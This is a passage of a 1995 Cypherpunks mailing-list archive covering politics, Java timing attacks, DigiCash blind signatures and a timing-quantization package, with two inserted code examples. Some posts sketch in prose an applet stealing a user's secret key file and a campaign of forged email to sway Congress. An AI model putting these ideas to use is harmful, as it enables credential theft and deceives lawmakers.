> was not. If the user had set their cache checking to "never",
> then if the document is in the cache, it will always be shown to
> the user, since no connection is made to the server.
 
>   Content providers who don't want their web pages cached
> should use the 'Pragma: no-cache' http header.  This will
> tell the navigator to not save the document in the disk cache.
> 
> 	--Jeff

Thanks for clearing that up - I see you've already been over to 
www-security. The fast response Netscape (and in particular, 
you yourself) make to reported problems is something I'm very
pleased to see.

Peter Trei
trei@process.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Kurt Buff (Volt Comp)" <a-kurtb@microsoft.com>
Date: Tue, 19 Dec 95 14:40:11 PST
To: "reh@wam.umd.edu>
Subject: RE: Political Cleanup program
Message-ID: <c=US%a=_%p=msft%l=RED-06-MSG951219111358NO00BA00@red-01-msg.itg.microsoft.com>
MIME-Version: 1.0
Content-Type: text/plain


Ya won't have complete equity amongst lobbyists, until ya remove the power 
of bureaucrats to control people's lives. When laws can be used to deprive 
people of their livelihood, via either taxation or regulation, you will 
create situations where people can make money from it, and therefore 
unscrupulous people will take advantage. The only defensible argument for 
government at all is to protect people from depredation, either from fellow 
citizens or from external threats. When you prevent people from engaging in 
peaceful commerce, you open the floodgates to tyranny. Thus, the solution is 
less government, not to try to legislate human nature.

Kurt
[speaking for myself, of course]

----------
From: 	Richard Huddleston[SMTP:reh@wam.umd.edu]
Sent: 	Monday, December 18, 1995 6:12
To: 	jimbell@pacifier.com; vznuri@netcom.com
Cc: 	cypherpunks@toad.com
Subject: 	Re: Political Cleanup program

Detweiler wrote:
* >JB:
* >>Politics is traditionally corrupt, it appears, because donors to politicians
* >>and political campaigns expect a quid pro quo for their donations.  Various
* >>unsatisfactory solutions include campaign spending limits, etc.
* >
* >I have an unusual view that I've never seen elsewhere: the problem with
* >our government is not that money or PACs are involved, but that the system
* >does not handle or resolve the conflicts between them very well. in other
* >words, in contrary to the current view that all PACs are evil, I think the
* >problem is not that we have PACs, but that our current system does not
* >balance their demands in some sensible manner.  the system is
* >susceptible to corruption. it is conceivable however that there would be
* >a system that involves money and politics but still avoids corruption.

Not to sound like a dupe or anything, but every time I get discouraged
at the rampant mealyism of our political system I go read the first
couple of paragraphs of a text from GOVT 101.  There, I get reminded that
the way most political debate is handled elsewhere is with bullets.

Personally, I welcome a complete equity between all lobbyists seeking to
obtain a politico's ear.  Take the money out of the equation, and let the
merits of their causes, if any, stand on their own. 

Happy holidays,

Richard






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Kurt Buff (Volt Comp)" <a-kurtb@microsoft.com>
Date: Tue, 19 Dec 95 11:33:19 PST
To: Bill Stewart <hallam@w3.org>
Subject: RE: Political Cleanup program [NOISE]
Message-ID: <c=US%a=_%p=msft%l=RED-06-MSG951219113213QA00CB00@red-70-msg.itg.microsoft.com>
MIME-Version: 1.0
Content-Type: text/plain




----------
From: 	hallam@w3.org[SMTP:hallam@w3.org]
Sent: 	Tuesday, December 19, 1995 8:22
To: 	Bill Stewart; cypherpunks@toad.com
Cc: 	hallam@w3.org
Subject: 	Re: Political Cleanup program [NOISE]  


>I happen to believe in freedom of speech, especially political speech,
>and if you're not allowed to spend money broadcasting your speech or
>printing your messages, you don't have much freedom of press or speech.

It is very strange the way that "Libertarians" are so able to turn all
rights into property rights. Thus freedom of speech becomes freedom to have
influence on the political process in direct proportion to wealth.

Not so strange really. All rights, correctly understood, *are* property 
rights. What most don't understand is that rights are protections from the 
initiation of force by others. What this means is that you (anyone) don't 
have the right to the property of others. You have the right to offer 
mutually satisfactory exchanges, or even solicit outright gifts, but what is 
yours is yours, and it shouldn't be subject to extortion or theft by others. 
This includes your time, cash, and any other tangible assets you may own.

I began work on the web in '92 because I saw its potential as a political tool
which did not have the bias of wealth. It has the potential to create a new kind
of political dialogue. When the Web becomes as ubiquitous as the telephone we
will still see inequalities of power, the homeless and the poor will still be
underrepresented. But that situation must be judged against our own where the
political process can be bought and traded as if it were any other form of
commodity.

The problem with the political process now is that the government and its 
beneficiaries (which includes both the large corporation and the welfare 
class) have over time arrogated to themselves the power to steal (via taxes 
and regulation) our lives and our livelihood from us. The poor and the rich 
will always be with us, but they shouldn't be special clients of the state 
at the expense of everyone else.

It is not simply an issue of money, it is an issue of national security. If a
foreigner were to control the majority of the media there would be a significant
threat to the national interest. This threat has been realised in the UK with
the coming to power of Rupert Murdoch. Fortunately his influence on the US
political scene has thus far been minor. In his own country he has brought down
the government more than once.

The only reason foreign money might be a threat to us is again that the 
government arrogated to itself the power to regulate our lives. The reason 
and interest for lobbying the government, whether through the press or 
through other, more direct, efforts is that the government *can do 
something* about whatever happens to be at issue. Take away the ability of 
the government to act, and there won't be any money spent lobbying it. I 
submit we'd all be better off.

>And as far as "prevent the political process from being owned by the rich"
>goes, there have been brief exceptions over the last 5000 years in which
>the less-rich have overthrown the rich, but campaign finance laws have almost
>never kept the rich or the politicians from helping each other out.

In UK politics the influence of an individual's money is limited to influencing
one party. Even that is done behind closed doors. The other major parties both
limit the size of individual contributions to a constituency party to a
relatively nominal sum. $5000 is a huge sum in UK politics.

>I also don't believe freedom of speech should be limited by national 
>boundaries.

Nor do I. But I only vote in one country. If we take the question outside the US
it would not on the whole be a good thing if the Prime Minister of Tobago (say)
were provided with a campaign contribution of $1M by a foreign company with an
interest in strip mining the entire island. Similarly it would be a bad thing if
Colombian drug lords were to make massive contributions to politicians committed
to continuing the prohibition on drugs.

See my above comments. Only if the PM of Tobago could steal the land from 
its owners could he permit the island to be strip-mined. And only if the 
government has the power to prohibit drug possession would the Cali cartel 
be interested in making campaign contributions. No power to do something, no 
money offered to do it.

Kurt
[speaking only for myself, of course]


		Phill









From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Tue, 19 Dec 95 08:36:15 PST
To: cypherpunks@toad.com
Subject: Antiterrorism Bill Dead
Message-ID: <2.2b10.32.19951219163342.006753a4@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


At last some good news from the Hill.  The House Judiciary Committee has
announced that they are unable to vote on Chukie Schumer's Antiterrorism
bill at this time.  It is "dead for now."  That means that the $500 million
for the telecoms companies to carry out the Digital telephony Initiative is
also dead for now.

Thanks to an heroic coalition of leftist civil liberties types and right
wing nuts (including the Fundies) for squashing it for now.  

Now if we could only convince the Fundies that the Klinton Admin was going
to use the Exxon amendment to outlaw religious speech on the nets on the
grounds of political indecency.  But maybe the Telecoms bill will die too.
It did last time.

DCF





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Andrew Loewenstern <andrew_loewenstern@il.us.swissbank.com>
Date: Tue, 19 Dec 95 09:38:34 PST
To: Jim_Miller@bilbo.suite.com
Subject: Re: Java and timing info - second attempt
Message-ID: <9512191737.AA00980@ch1d157nwk>
MIME-Version: 1.0
Content-Type: text/plain


Jim Miller (jim_miller@bilbo.suite.com) writes:
>  Would it be possible to create a Java applet that causes the client
>  machine to sign or encrypt something with their private key, and
>  then send back timing info?

Since access to a private key should always be strictly mediated by the user  
any Java implementation would probably pop up a panel asking permission for  
every single private-key encryption operation requested by the applet.  The  
timing attacks require many timed encryptions to get enough information about  
the key.  Even if the user was completely clueless and had no idea what the  
applet was trying to do I would imagine that they would get tired of clicking  
"OK" long before sufficient key information was leaked .....

Of course it would be a lot easier for the applet to just try to read the  
secret key file, encrypt it with an embedded public key, and post it to  
alt.anonymous.messages.  Depending on how security was set up there might be  
only one or two panels that the user has to dismiss.  It would probably get  
past the same number of clueless users that a more complicated timing attack  
would fool.


andrew




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Tue, 19 Dec 95 12:22:25 PST
To: Andrew Loewenstern <Jim_Miller@bilbo.suite.com
Subject: Re: Java and timing info - second attempt
Message-ID: <199512192018.MAA27098@netcom23.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


>Jim Miller (jim_miller@bilbo.suite.com) writes:
>Of course it would be a lot easier for the applet to just try to read the  
>secret key file, encrypt it with an embedded public key, and post it to  
>alt.anonymous.messages.

If I understand Java security correctly, the applet can just send data back
to the server it was loaded from, but can't read random files on the
machine it runs on (even if the user running it can read them).  Java is
beginning to become clueful about the idea that a program is not the same
as the person running it, and should not have the same privileges.  In this
area, most OSs (including Unix) are totally clueless, which is why the
Orange Book has mandatory security requirements at the "B" and above
levels.


-----------------------------------------------------------------
Bill Frantz                   Periwinkle  --  Computer Consulting
(408)356-8506                 16345 Englewood Ave.
frantz@netcom.com             Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@mbcl.rutgers.edu>
Date: Tue, 19 Dec 95 11:25:26 PST
To: hallam@w3.org
Subject: Re: Political Cleanup program [NOISE]
Message-ID: <01HYZTGSFLM48Y529F@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"hallam@w3.org" 19-DEC-1995 13:48:07.90

>It is very strange the way that "Libertarians" are so able to turn all
rights into property rights. Thus freedom of speech becomes freedom to have
influence on the political process in direct proportion to wealth.
------------------
	Funny, I'm disagreeing with you, and I believe that government ought to
be involved with making sure everyone has a chance to make political speech
(via subsidies of education). That doesn't mean that those who can make more
speech (through money or any other ability) should be handicapped.
------------------

>I began work on the web in '92 because I saw its potential as a political tool 
which did not have the bias of wealth. It has the potential to create a new
kind of political dialogue. When the Web becomes as ubiquitous as the
telephone we will still see inequalities of power, the homeless and the poor
will still be underrepresented. But that situation must be judged against our
own where the political process can be bought and traded as if it were any
other form of commodity.
------------------
	You're making the classic PC (otherwise known as distorted egalitarian)
mistake: you're wanting equality of results instead of equality of opportunity.
Freedom of speech and the press doesn't mean that everyone gets a free press
subsidized by the government, and no usage of means outside of that. It means
that everyone _potentially_ can influence the political process and the
marketplace of ideas.
------------------

>It is not simply an issue of money, it is an issue of national security. If a 
foreigner were to control the majority of the media there would be a
significant threat to the national interest. This threat has been realised in
the UK with the coming to power of Rupert Murdoch. Fortunately his influence
on the US political scene has thus far been minor. In his own country he has
brought down the government more than once.
-----------------
	This argument looks quite similar to those used for Canadian Content
restrictions. "We can't let in Hollywood, they might be more demanded by the
people than our own culture." "We can't let in Rupert Murdoch, his product
might be more demanded by the people than our own products." It all comes down
to people not having the courage to let their ideas be tested by what will get
the most demand.
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "David Klur" <dklur@dttus.com>
Date: Tue, 19 Dec 95 11:59:41 PST
To: cypherpunks@toad.com
Subject: E-cash coin questions (Mark Twain / Digicash)
Message-ID: <9511198194.AA819410227@cc2.dttus.com>
MIME-Version: 1.0
Content-Type: text/plain


     
     
     1.  How many different coins (serial numbers) can the current Mark 
     Twain/Digicash protocol support?
     
     2. Does Mark Twain bank maintain 2 lists: 1 of all the ecash serial 
     numbers for all coins ever produced, and 1 of all the ecash serial 
     numbers for all coins that have been spent before?  Or just 1 list of 
     the spent coins (assuming that any coin that is signed w/MT's private 
     key and does not appear on the "spent" list is still valid and is not 
     counterfeit)?
     
     3.  The Digicash scheme allows each coin to be used only once and then 
     destroyed.  How many coins will it take before all possible coins are 
     minted, used and destroyed thereby requiring banks to issue new coins 
     with "recycled" serial numbers?  Remember, each time a "transaction" 
     takes place, an existing coin is destroyed and a new coin is minted. 
     and a transaction can simply be Alice giving her friend Bob a dollar 
     (not necessarily using the ecash for a purchase)
     
     
     4.  What is the probability of guessing a valid serial number, 
     assuming there are 1 million, 1 billion or 1 trillion coins in 
     circulation?
     
     5.  Suppose you have a very large number of cash coins signed by the 
     same bank (say, Mark Twain) and you know the record layout of each 
     coin (easy enough since you can decrypt it with the bank's public 
     key), and for each coin the "bank name" field is the same (because 
     it's the same bank!) -- then, would it be possible to hack the RSA 
     encryption and recreate the bank's private key?
     
     
     -----BEGIN PBP SIGNATURE-----
     Version: 1.0.0, Copyright 1995, Pretty Bad Privacy
     
     David Klur   
     dklur@dttus.com
     
     I am who I am because I say so.  So there. 
     -----END PBP SIGNATURE-------
     





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matt Blaze <mab@research.att.com>
Date: Tue, 19 Dec 95 12:02:14 PST
To: cypherpunks@toad.com
Subject: revised time quantization package (Unix & WIN32) available
Message-ID: <199512192009.PAA17051@nsa.tempo.att.com>
MIME-Version: 1.0
Content-Type: text/plain


A revised version of my simple CPU time quantization package is
now available for most Unix and, thanks to the efforts of Frank
O'Dwyer (Rainbow Diamond Ltd), WIN32 platforms.  The package provides
a simple interface to encapsulate code blocks that must run in a
multiple of a coarse-grained "quantized" amount of CPU time.  It
is useful in building various on-line cryptographic protocols in
which an attacker could otherwise learn key information by observing
the time the target takes to perform calculations that use the
secret (cf. Paul Kocher's recent attacks).

The basic idea is that you can specify a "quantum" such that at
the end of an encapsulated block the CPU will busy-wait until the
next quantum multiple.  Fine-grained (below the quantum) timing
information is thereby denied to the observer (including unprivileged
processes on the same machine).  The code is quick-and-dirty and
only runs on Unix-centric and WIN32-based platforms.  Test and use
at your own risk.

There are (basically) no restrictions on the use or distribution
of the (very simple) code.

Get it from:
	ftp://research.att.com/dist/mab/quantize.shar

The quantize package is also part of Jack Lacy's cryptolib package
(watch this space for details).

-matt
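
An added example, not code from the quantize package or from the author of the post above: it shows the busy-wait-to-the-next-quantum idea wrapped around a square-and-multiply exponentiation whose running time depends on the exponent. The names quant_ctx, quant_begin, quant_end, quantized_modexp and observed_cpu_ms, and the choice of clock() as the CPU-time source, are assumptions of this example.

```c
/* Added example: CPU-time quantization as described in the post above.
 * Every name here is hypothetical; this is not the code in quantize.shar. */
#include <stdint.h>
#include <stdio.h>
#include <time.h>

typedef struct {
    clock_t start;    /* process CPU time at block entry */
    clock_t quantum;  /* quantum length in clock() ticks */
} quant_ctx;

/* Open a quantized block. Returns 0, or -1 if the quantum is unusable. */
int quant_begin(quant_ctx *q, unsigned quantum_ms)
{
    q->quantum = (clock_t)((uint64_t)quantum_ms * CLOCKS_PER_SEC / 1000);
    q->start = clock();
    if (q->quantum <= 0 || q->start == (clock_t)-1)
        return -1;
    return 0;
}

/* Close the block: busy-wait until the CPU time used since quant_begin()
 * reaches the next multiple of the quantum. Returns that multiple, or -1. */
long quant_end(const quant_ctx *q)
{
    clock_t now = clock();
    if (now == (clock_t)-1)
        return -1;
    long n = (long)((now - q->start) / q->quantum) + 1;
    clock_t target = q->start + (clock_t)n * q->quantum;
    while ((now = clock()) != (clock_t)-1 && now < target)
        ;   /* spin: sleeping would not consume CPU time */
    return now == (clock_t)-1 ? -1 : n;
}

/* Textbook square-and-multiply. It multiplies only for the 1 bits of the
 * exponent, so its running time depends on the (secret) exponent.
 * mod must be non-zero and below 2^32 so products fit in 64 bits. */
uint64_t modexp(uint64_t base, uint64_t exp, uint64_t mod)
{
    uint64_t result = 1 % mod;
    base %= mod;
    while (exp) {
        if (exp & 1)
            result = result * base % mod;
        base = base * base % mod;
        exp >>= 1;
    }
    return result;
}

/* Run modexp inside a quantized block. Stores the result in *out when out
 * is not NULL; returns the number of quanta consumed, or -1 on error. */
long quantized_modexp(uint64_t base, uint64_t exp, uint64_t mod,
                      unsigned quantum_ms, uint64_t *out)
{
    quant_ctx q;
    if (mod == 0 || quant_begin(&q, quantum_ms) != 0)
        return -1;
    uint64_t v = modexp(base, exp, mod);
    if (out)
        *out = v;
    return quant_end(&q);
}

/* CPU milliseconds an outside observer would measure for one padded call. */
long observed_cpu_ms(uint64_t exp, unsigned quantum_ms)
{
    uint64_t r;
    clock_t t0 = clock();
    if (quantized_modexp(3, exp, 4294967291ULL, quantum_ms, &r) < 0)
        return -1;
    return (long)((uint64_t)(clock() - t0) * 1000 / CLOCKS_PER_SEC);
}

int main(void)
{
    uint64_t r;
    /* Constructed inputs: a one-bit exponent and an all-ones exponent. */
    long sparse = quantized_modexp(3, 1, 4294967291ULL, 20, &r);
    long dense = quantized_modexp(3, UINT64_MAX, 4294967291ULL, 20, &r);
    printf("quanta used: sparse exponent %ld, dense exponent %ld\n",
           sparse, dense);
    return 0;
}
```

The padding hides timing differences only while the quantum exceeds the worst-case running time of the enclosed block; if some inputs spill into a second quantum, the quantum count itself becomes the leak.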




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: SINCLAIR  DOUGLAS N <sinclai@ecf.toronto.edu>
Date: Tue, 19 Dec 95 12:30:49 PST
To: cypherpunks@toad.com
Subject: DES modem
Message-ID: <95Dec19.153022edt.1588@cannon.ecf.toronto.edu>
MIME-Version: 1.0
Content-Type: text/plain


I recently acquired a DES modem.  It's a MESA432 made by Western Datacom.
The writing on the front proclaims "9600 bps NBS DES ENCRYPTION MODEM".
It has all of the usual front lights, plus one labeled 'encrypt'.  On
the back it has jacks for leased-line and dial-up, an RS232 connector
and an external speaker connector.

Has anyone ever used one of these?  Can anyone give me any information on it?
I realize that without a second modem it's not much use.



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Kurt Buff (Volt Comp)" <a-kurtb@microsoft.com>
Date: Tue, 19 Dec 95 16:00:09 PST
To: Bill Stewart <hallam@w3.org>
Subject: RE: Political Cleanup program [NOISE]
Message-ID: <c=US%a=_%p=msft%l=RED-06-MSG951219153443UD006800@red-01-msg.itg.microsoft.com>
MIME-Version: 1.0
Content-Type: text/plain


Let's try this again, shall we? My mailer didn't act the way I wanted it 
to...
___________________________________
>I happen to believe in freedom of speech, especially political speech,
>and if you're not allowed to spend money broadcasting your speech or
>printing your messages, you don't have much freedom of press or speech.

It is very strange the way that "Libertarians" are so able to turn all
rights into property rights. Thus freedom of speech becomes freedom to have
influence on the political process in direct proportion to wealth.
_____________________________________
Not so strange really. All rights, correctly understood, *are* property 
rights. What most don't understand is that rights are protections from the 
initiation of force by others. What this means is that you (anyone) don't 
have the right to the property of others. You have the right to offer 
mutually satisfactory exchanges, or even solicit outright gifts, but what is 
yours is yours, and it shouldn't be subject to extortion or theft by others. 
This includes your time, cash, and any other tangible assets you may own.
_______________________________________________
I began work on the web in '92 because I saw its potential as a political tool
which did not have the bias of wealth. It has the potential to create a new kind
of political dialogue. When the Web becomes as ubiquitous as the telephone we
will still see inequalities of power, the homeless and the poor will still be
underrepresented. But that situation must be judged against our own where the
political process can be bought and traded as if it were any other form of
commodity.
________________________________________
The problem with the political process now is that the government and its 
beneficiaries (which includes both the large corporation and the welfare 
class) have over time arrogated to themselves the power to steal (via taxes 
and regulation) our lives and our livelihood from us. The poor and the rich 
will always be with us, but they shouldn't be special clients of the state 
at the expense of everyone else.
_____________________________________
It is not simply an issue of money, it is an issue of national security. If a
foreigner were to control the majority of the media there would be a significant
threat to the national interest. This threat has been realised in the UK with
the coming to power of Rupert Murdoch. Fortunately his influence on the US
political scene has thus far been minor. In his own country he has brought down
the government more than once.
_____________________________________________
The only reason foreign money might be a threat to us is again that the 
government arrogated to itself the power to regulate our lives. The reason 
and interest for lobbying the government, whether through the press or 
through other, more direct, efforts is that the government *can do 
something* about whatever happens to be at issue. Take away the ability of 
the government to act, and there won't be any money spent lobbying it. I 
submit we'd all be better off.
________________________________________________
>And as far as "prevent the political process from being owned by the rich"
>goes, there have been brief exceptions over the last 5000 years in which
>the less-rich have overthrown the rich, but campaign finance laws have almost
>never kept the rich or the politicians from helping each other out.

In UK politics the influence of an individual's money is limited to influencing
one party. Even that is done behind closed doors. The other major parties both
limit the size of individual contributions to a constituency party to a
relatively nominal sum. $5000 is a huge sum in UK politics.

>I also don't believe freedom of speech should be limited by national 
>boundaries.

Nor do I. But I only vote in one country. If we take the question outside the US
it would not on the whole be a good thing if the Prime Minister of Tobago (say)
were provided with a campaign contribution of $1M by a foreign company with an
interest in strip mining the entire island. Similarly it would be a bad thing if
Colombian drug lords were to make massive contributions to politicians committed
to continuing the prohibition on drugs.
_______________________________________
See my above comments. Only if the PM of Tobago could steal the land from 
its owners could he permit the island to be strip-mined. And only if the 
government has the power to prohibit drug possession would the Cali cartel 
be interested in making campaign contributions. No power to do something, no 
money offered to do it.
____________________
		Phill


Kurt
[Speaking only for myself, of course]





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hallam@w3.org
Date: Tue, 19 Dec 95 12:58:49 PST
To: cypherpunks@toad.com
Subject: Re: Antiterrorism Bill Dead
In-Reply-To: <2.2b10.32.19951219163342.006753a4@panix.com>
Message-ID: <9512192058.AA14733@zorch.w3.org>
MIME-Version: 1.0
Content-Type: text/plain



>Now if we could only convince the Fundies that the Klinton Admin was going
>to use the Exxon amendment to outlaw religious speech on the nets on the
>grounds of political indecency.  But maybe the Telecoms bill will die too.
>It did last time.

Last I heard it was headed for a veto. Way too much pork for Republican 
contributors to get anywhere.


		Phill



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: fc@all.net (Dr. Frederick B. Cohen)
Date: Tue, 19 Dec 95 13:05:48 PST
To: cypherpunks@toad.com
Subject: Forged email to sway congress
Message-ID: <9512192101.AA13974@all.net>
MIME-Version: 1.0
Content-Type: text


It seems like a trivial thing to do, but if email to Congress works to
sway opinion, it should be fairly easy to create thousands of email
messages from different apparent sources each hour, all supporting a
point of view, and to supplement this effort with a small telephone room
full of people to fill congressional switchboards with supportive phone
calls.  Interesting PM attack.

-> See: Info-Sec Heaven at URL http://all.net/
Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vinod Valloppillil" <vvallopp@eniac.seas.upenn.edu>
Date: Tue, 19 Dec 95 13:19:07 PST
To: cypherpunks@toad.com
Subject: cyphernomicon FTP site?
Message-ID: <199512192118.QAA02590@red.seas.upenn.edu>
MIME-Version: 1.0
Content-Type: text/plain


Anyone know where I can FTP a full copy of the cyphernomicon?

------------------------------+-----------------------------------------------
Vinod Valloppillil            | LibertarianismTelecommunicationsFreeMarketEnvi 
Engineering/Wharton           | ronmentalismTechnologyCryptographyElectronicCa
University of Pennsylvania    | shInteractiveTelevisionEconomicsPhilosophyDigi
vvallopp@eniac.seas.upenn.edu | talPrivacyAnarchoCapitalismRuggedIndividualism
------------------------------+-----------------------------------------------



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill.Humphries@msn.fullfeed.com (Bill Humphries)
Date: Tue, 19 Dec 95 15:14:37 PST
To: The Cypherpunk Mailing List <cypherpunks@toad.com>
Subject: Applescripts for monitoring Netscape Activity
Message-ID: <v01530500acfcf5689227@[199.184.183.25]>
MIME-Version: 1.0
Content-Type: text/plain


The recent Netscape beta bug mentioned here raised a technical question.

Anyone here have a pointer to an applescript, frontier or macperl script
for monitoring what programs do to your system folder and desktop?
Otherwise, I'd better write one.

It'd be a good way to learn more about the behavior of apps.

Thanks and happy holidays,

Bill Humphries

        Call your Representative and Senators and demand an end to
     attempts to censor the Internet. More info at http://www.vtw.org/
    *** The answer to porn speech is free speech -- via Molly Ivins ***






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Tue, 19 Dec 95 17:30:30 PST
To: ecash@digicash.com
Subject: Re:  E-cash coin questions (Mark Twain / Digicash)
Message-ID: <199512200128.RAA09801@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


From: "David Klur" <dklur@dttus.com>
>      
>      1.  How many different coins (serial numbers) can the current Mark 
>      Twain/Digicash protocol support?

I don't know this offhand, but I assume it is at least 2^64.

>      2. Does Mark Twain bank maintain 2 lists: 1 of all the ecash serial 
>      numbers for all coins ever produced, and 1 of all the ecash serial 
>      numbers for all coins that have been spent before?  Or just 1 list of 
>      the spent coins (assuming that any coin that is signed w/MT's private 
>      key and does not appear on the "spent" list is still valid and is not 
>      counterfeit)?

It is not possible for the bank to have a list of the serial numbers on
coins produced, since it doesn't know this information.  Each coin is
created by a user's client software, which chooses the serial number at
random.  When it is sent to the bank to be signed, the serial number is
blinded by being multiplied by a random number, which is divided off
after the client gets it back from the bank.  So the bank never sees a
coin's serial number until it is deposited.

>      3.  The Digicash scheme allows each coin to be used only once and then 
>      destroyed.  How many coins will it take before all possible coins are 
>      minted, used and destroyed thereby requiring banks to issue new coins 
>      with "recycled" serial numbers?  Remember, each time a "transaction" 
>      takes place, an existing coin is destroyed and a new coin is minted. 
>      and a transaction can simply be Alice giving her friend Bob a dollar 
>      (not necessarily using the ecash for a purchase)

It is easy to make this number so large that it will take longer than the
age of the universe for this to happen.  It just takes a dozen or so
bytes per coin.

>      4.  What is the probability of guessing a valid serial number, 
>      assuming there are 1 million, 1 billion or 1 trillion coins in 
>      circulation?

Assuming the serial numbers are of the sizes I suggest above, this
chance is so close to zero that your chances of being named King of the
Earth next year (along with the assumption that we switch to a World
Government and it is a monarchy) are much greater.

>      5.  Suppose you have a very large number of ecash coins signed by the 
>      same bank (say, Mark Twain) and you know the record layout of each 
>      coin (easy enough since you can decrypt it with the bank's public 
>      key), and for each coin the "bank name" field is the same (because 
>      it's the same bank!) -- then, would it be possible to hack the RSA 
>      encryption and recreate the bank's private key?

I don't fully understand what you are getting at, but there are several
false assumptions here.  The "coin" has several parts, one of which is an
RSA signed portion with a number in it, for which I am accepting your
terminology of it being a "serial number".  This terminology is not quite
right, as the coins are not numbered serially (that is, sequentially, 1,
2, 3, etc.), rather the numbers are random.  But it does capture the
essential idea that each coin's number is unique.

You do know the record layout of each coin, but that is because it is
documented and because your client creates coins, not because you could
decrypt it with the bank's public key.  The coin does not have the bank
name field within the RSA signed part.  There is other information
which goes along with the coin, including an identifier for the bank,
outside the RSA signed portion.

For the general question of whether inspection of a lot of RSA-signed
coins would allow you to deduce the private key, the answer is no, as
far as is known.  Actually the attack you can mount is stronger than
this; you can get the bank to RSA sign any number.  You could ask it to
sign "1", for example, and you will get "1" back (so that's not very
useful).  I have tried to think of a way of getting some useful
information from getting it to sign "2", since that is such a simple
number.  But it is raised to a very large power, and as far as I can
see what you will get back is just a random looking number, with all
hints about the exponent gone.

Again, as far as anyone knows, there is no way to break RSA using these
kinds of attacks, at least not any more cheaply than factoring the modulus.

Hal
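
The blinding exchange described in the message above, worked through as an added example (not part of the original post and not DigiCash's code). Assumptions: textbook RSA without padding, a toy key built from two Mersenne primes, a hash of the serial as the signed number, and hypothetical names throughout.

```python
import hashlib
import secrets
from math import gcd

# Toy bank key from two Mersenne primes (constructed for this example; far too
# small for real use). Textbook RSA, no padding.
P, Q = 2**127 - 1, 2**89 - 1
N, E = P * Q, 65537
D = pow(E, -1, (P - 1) * (Q - 1))      # bank's private exponent


def coin_number(serial: bytes) -> int:
    """The number inside the signed portion. Assumption of this example: a
    hash of the serial, so a coin cannot be built by choosing the signature
    first and computing a matching number from it."""
    return int.from_bytes(hashlib.sha256(serial).digest(), "big") % N


class Bank:
    def __init__(self):
        self.signed_blind = []   # every number the bank saw at withdrawal
        self.spent = set()       # the only coin list the bank is able to keep

    def sign(self, number: int) -> int:
        """Signs whatever it is handed; it cannot tell what is underneath."""
        self.signed_blind.append(number)
        return pow(number, D, N)

    def deposit(self, serial: bytes, signature: int) -> str:
        """First time the bank sees a serial: check signature, then spent list."""
        if pow(signature, E, N) != coin_number(serial):
            return "bad signature"
        if serial in self.spent:
            return "already spent"
        self.spent.add(serial)
        return "ok"


def withdraw(bank: Bank):
    """Client side: choose a random serial, blind it, have it signed, unblind."""
    serial = secrets.token_bytes(16)               # "a dozen or so bytes"
    m = coin_number(serial)
    while True:
        r = secrets.randbelow(N - 2) + 2           # blinding factor, 2 <= r < N
        if gcd(r, N) == 1:
            break
    blinded = (m * pow(r, E, N)) % N               # m * r^e mod N
    blind_sig = bank.sign(blinded)                 # (m * r^e)^d = m^d * r
    signature = (blind_sig * pow(r, -1, N)) % N    # divide r off, leaving m^d
    return serial, signature


if __name__ == "__main__":
    bank = Bank()
    serial, signature = withdraw(bank)
    print("bank saw coin number at withdrawal:",
          coin_number(serial) in bank.signed_blind)
    print("first deposit :", bank.deposit(serial, signature))
    print("second deposit:", bank.deposit(serial, signature))
    print("signing 1 gives:", bank.sign(1))
```

The spent set is the single list from question 2: the bank has no record of serials at issue time, because the only numbers it signed were blinded ones.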




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hallam@w3.org
Date: Tue, 19 Dec 95 15:48:35 PST
To: cypherpunks@toad.com
Subject: Re: Forged email to sway congress
In-Reply-To: <9512192101.AA13974@all.net>
Message-ID: <9512192345.AA15356@zorch.w3.org>
MIME-Version: 1.0
Content-Type: text/plain



It already happens with other media. The Christian Coalition have an army of 
letter writers at their call. They simply write a very large number of letters
and post them. It is not difficult if you can afford it.

Political staffers know all about this type of thing and can recognise spam. 

It would be useful to have some mechanism for producing a one time use ID on
the Web however. This would be configured such that each party can vote once but 
once only. There is stuff in the open meeting system that does this using an 
email callback loop (later used by First Virtual).

	Phill



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Tue, 19 Dec 95 15:50:10 PST
To: cpunk@remail.ecafe.org (ECafe Anonymous Remailer)
Subject: Re: revised time quantization package (Unix & WIN32) available
In-Reply-To: <199512192232.WAA18554@pangaea.ang.ecafe.org>
Message-ID: <199512192349.SAA25296@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



ECafe Anonymous Remailer writes:
[Lots of garbage slandering Matt Blaze, who's about as close to being
a dyed-in-the-DNA cypherpunk as you can get.]

What I want to know is, why are you doing this? Are you trying to
start a flame war? Are you just an asshole? Are you Detweiler? What's
the motive?

.pm




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matt Blaze <mab@crypto.com>
Date: Tue, 19 Dec 95 16:03:46 PST
To: cypherpunks@toad.com
